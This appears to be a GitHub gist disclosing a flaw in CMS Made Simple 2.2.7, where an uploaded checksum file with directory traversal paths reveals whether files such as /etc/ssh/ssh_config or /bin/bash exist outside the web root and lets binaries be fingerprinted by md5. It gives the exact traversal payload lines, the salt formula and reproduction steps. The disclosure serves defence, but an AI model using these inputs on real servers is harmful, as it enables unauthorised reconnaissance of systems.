Created
April 9, 2018 20:13
-
-
Save 0xn1k5/ef4c7c7a26c7d8a803ef3a85f1000c98 to your computer and use it in GitHub Desktop.
Possible to brute force and fingerprint known files and directories in CMS Made Simple web application
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Issue Description: | |
CMS Made Simple web application has the feature which allows the admin user to download a checksum file which can be used to verify the integrity of files in case of any hacking attempt. It was observed that the user can upload a custom checksum verification file to identify the valid directory and files outside the website installation directory using directory traversal technique. | |
Issue verified on version: CMS Made Simple V 2.2.7 (latest), earlier version may also be affected | |
Download Link: http://s3.amazonaws.com/cmsms/downloads/14144/cmsms-2.2.7-install.zip | |
Vendor Site: https://www.cmsmadesimple.org/about/cms-made-simple/ | |
Risk: | |
It may allow the user to verify the applications installed by probing known files and directories. | |
In case of default installations, It is also possible to fingerprint the known binaries by comparing the md5 hash to identify the application/binary version. | |
Steps to reproduce the issue: | |
1) Login to admin dashboard using below url or navigate to "Site Admin" > "System Verification" > "Perform Validation" | |
http://target/path/admin/checksum.php?__c=fde83629cd9b67f8911 | |
2) Download the checksum file and upload the modified checksum file having below entry: | |
Case 1: If Directory exists - Output: "All Checksum match" | |
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh | |
Case 2: If Directory doesn't exists - Output: "1 File not found" | |
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh2 | |
Case 3: If File exists - Output: "1 Files failed md5sum check" | |
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config | |
Case 4: If File doesn't exists - Output: "1 File not found" | |
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config_no_file | |
3) The checksum values on left side is made using below formula. In case of default installations, md5 checksum of /lib/version.php and index.php files can identified via test setup and combined with md5sum of known binary be used to probe the server. | |
Code Snippet: | |
$salt = md5_file($config['root_path']."/lib/version.php").md5_file($config['root_path']."/index.php"); | |
: | |
: | |
$md5 = md5($salt.md5_file($fn)) | |
Case: Verifying checksum of /bin/bash - Output: "All checksums match those in the uploaded file" | |
71fdfce0a76d11f6db3e3ac730bf223a--::--/modules/Search/templates/../../../../../../../bin/bash | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Probing a valid file
![directory-structure-mapping-01-valid-file](https://user-images.githubusercontent.com/934150/38520527-ae55f728-3c60-11e8-86ef-e63fb6e7b1fd.PNG)
Probing a invalid file
![directory-structure-mapping-01-invalid-file](https://user-images.githubusercontent.com/934150/38520531-afcb284e-3c60-11e8-93b5-5780ce793c87.PNG)
Probing a valid directory name
![directory-structure-mapping-01-valid-directory](https://user-images.githubusercontent.com/934150/38520532-b0020c38-3c60-11e8-8bd1-448fdfc0d8f3.PNG)
Probing a invalid directory name
![directory-structure-mapping-01-invalid-directory](https://user-images.githubusercontent.com/934150/38520530-af94f6ac-3c60-11e8-8735-cc578494e21f.PNG)
Calculating md5 hash for known binary
![fingerprinting-known-binary-02](https://user-images.githubusercontent.com/934150/38520529-af64ce6e-3c60-11e8-8fc5-c80de2872e4f.PNG)
Verifying/fingerprinting the known binary using md5 checksum calculated above
![fingerprinting-known-binary-01](https://user-images.githubusercontent.com/934150/38520528-ae974b60-3c60-11e8-832e-462ef164df7f.PNG)